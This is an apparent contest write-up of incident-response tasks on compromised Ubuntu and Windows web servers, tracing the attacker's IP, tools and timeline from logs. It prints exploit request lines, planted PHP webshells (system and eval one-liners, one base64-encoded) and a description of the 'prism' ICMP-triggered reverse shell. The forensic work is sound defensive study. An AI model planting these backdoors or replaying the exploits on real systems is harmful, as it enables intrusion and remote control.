信安大赛-应急响应

Ubuntu应急响应

|----|--------------------------------------|
| 1 | 提交攻击者的IP地址 |
| 2 | 识别攻击者使用的操作系统 |
| 3 | 找出攻击者资产收集所使用的平台 |
| 4 | 提交攻击者目录扫描所使用的工具名称 |
| 5 | 提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS |
| 6 | 找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码 |
| 7 | 找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径) |
| 8 | 识别系统中存在的恶意程序进程,提交进程名 |
| 9 | 找到文件系统中的恶意程序文件并提交文件名(完整路径) |
| 10 | 简要描述该恶意文件的行为 |

root

1234546

1.提交攻击者的IP地址

一直找日志

是这个

more access.log.1 

从192.168.1.5到192.168.1.7就不一样了猜测攻击者是192.168.1.7

192.168.1.5 - - [24/Apr/2022:15:11:48 +0000] "GET /data/captcha/ckstr.php HTTP/1.1" 200 1499 "http://192.168.1.3/message.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"::1 - - [24/Apr/2022:15:11:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) (internal dummy connection)"
192.168.1.7 - - [24/Apr/2022:15:14:32 +0000] "GET / HTTP/1.1" 408 482 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:14:52 +0000] "GET /favicon.ico HTTP/1.1" 200 39411 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

192.168.1.7

2.识别攻击者使用的操作系统
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

Linux x86_64

3.找出攻击者资产收集所使用的平台

shodan.io

日志中找到

shodan.io

4.提交攻击者目录扫描所使用的工具名称
192.168.1.7 - - [24/Apr/2022:15:17:45 +0000] "GET /rHdA9nYoF68B HTTP/1.1" 404 43
4 "-" "DIRSEARCH"

DIRSEARCH

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "GET /shoppingcart.php?a=addshopinggcart&goodsid=1&buynum=2&goodsattr=as%26time=999999999999999999%26uid=/../../../pproc/self/cwd/1.php%26a=1 HTTP/1.1" 200 425 "-" "python-requests/2.23.0"
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "POST //data/avatar/upload.php?a=upploadavatar&input=2690b1IhecCIpeAK%2BnPLfbnP3AF%2F9TwHSnAxI%2BAfZ%2BC0xIaO33AMyGeeGhpEIO2WxXowgLJ%2FFbPKzhcd1x4Xlwdbs1Pjg5V6Yy2MSj1yzlbw6eHXc6Mu%2FZ5BSbVUolg2kh400WeVCGgHRYc4Zu8X4VONadz5WOuerWpdPmDRtAjQb8lZjMVQDSPgY&_SERVER%5BHTTP_USER_AGENT%55D%5B%5D=1 HTTP/1.1" 200 296 "-" "python-requests/2.23.0"

这两条日志

先是上传了一个php文件

然后命令执行了

24/Apr/2022:15:25:53

24/04/22:15:25:53

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

根据上题日志

上传了一个1.php

find / -name 1.php
root@webserver:/# cd /var/www/html/data/avatar
root@webserver:/var/www/html/data/avatar# ls
1.php  images  index.php  lib  upload.php
root@webserver:/var/www/html/data/avatar# cat 1.php
<?php system($_GET[2022]);?>
        #define width 20
        #define height 20

文件名:1.php

后门密码:2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
root@webserver:/var/www/html# cat footer.php 
<!-- weblink-->

<div class="weblink">
        <?php
        $dosql->Execute("SELECT * FROM `#@__weblink` WHERE classid=1 AND checkinfo=true ORDER BY orderid,id DESC");
        while($row = $dosql->GetArray())
        {
        ?>
        <a href="<?php echo $row['linkurl']; ?>" target="_blank"><?php echo $row['webname']; ?></a>
        <?php
        }
        ?>
</div>
<!-- /weblink-->
<!-- footer-->
<div class="footer"><?php echo $cfg_copyright ?><br />网站采用 <a href="http://phpmywind.com" target="_blank">PHPMyWind</a> 核心</div>
<!-- /footer-->
<?php
@eval($_POST['catchmeifyoucan'])
echo GetQQ();

//将流量统计代码放在页面最底部
$cfg_countcode;

?>

一个后门

/var/www/html/footer.php

8.识别系统中存在的恶意程序进程,提交进程名
ps aux
cat prism
9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

根据上题

/root/.mal/prism

10.简要描述该恶意文件的行为

根据上上题

等待来自攻击者的ICMP数据包,该数据包包含要回连的主机、端口和密钥,被激活后将/bin/sh回连到主机指定端口,供攻击者执行命令

windows服务器应急响应

首先环境是这样的,比linux应急响应好多了,有图形界面...

1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss

在phpstudy目录下搜索日志文件

省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...

这条是登录了管理员账号

29/Apr/2023:22:45:23

23:04:29 10:45:23

2.请提交攻击者的浏览器版本

Firefox/110.0

3.请提交攻击者目录扫描所使用的工具名称

Fuzz Faster U Fool

4.找到攻击者写入的恶意后门文件,提交文件名(完整路径)

C:\phpstudy_pro\WWW\.x.php

5.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

PD9waHAgQGV2YWwoJF9SRVFVRVNUWyd4J10pOyA/Pg==

C:\phpstudy_pro\WWW\usr\themes\default\post.php

6.请提交内存中可疑进程的PID

在资源监视器里发现有外联

1200

7.请提交攻击者执行过几次修改文件访问权限的命令

2

8.请指出可疑进程采用的自动启动的方式

策略组->计算机配置->Windows设置->脚本(启动/关机)->启动->属性

发现自启动了一个bat脚本

相关推荐
然然阿然然22 分钟前
2025.1.15——二、字符型注入
网络·数据库·sql·学习·网络安全
Danileaf_Guo44 分钟前
Ubuntu磁盘空间不足或配置错误时,如何操作扩容?
linux·运维·服务器·ubuntu
嘻嘻哈哈曹先生1 小时前
Java负载均衡
运维·github·负载均衡
Linux运维老纪1 小时前
K8s 集群 IP 地址管理指南(K8s Cluster IP Address Management Guide)
linux·运维·tcp/ip·容器·kubernetes·云计算·运维开发
鸭梨山大。1 小时前
ubuntu安全配置基线
linux·安全·ubuntu
xiao-xiang1 小时前
nginx-lua模块安装
运维·nginx·lua
然然阿然然1 小时前
2025.1.15——六、SQL结构【❤sqlmap❤】
数据库·sql·学习·安全·web安全·网络安全
霍格沃兹测试开发学社测试人社区2 小时前
三大智能体平台对比分析:FastGPT、Dify、Coze 哪个更适合你?
大数据·软件测试·数据库·人工智能·测试开发
PersistJiao2 小时前
数据仓库的复用性:设计和构建一个高复用性的数仓
大数据·数据仓库·spark
WeeJot嵌入式2 小时前
【Linux】进程间通信IPC
linux·运维·算法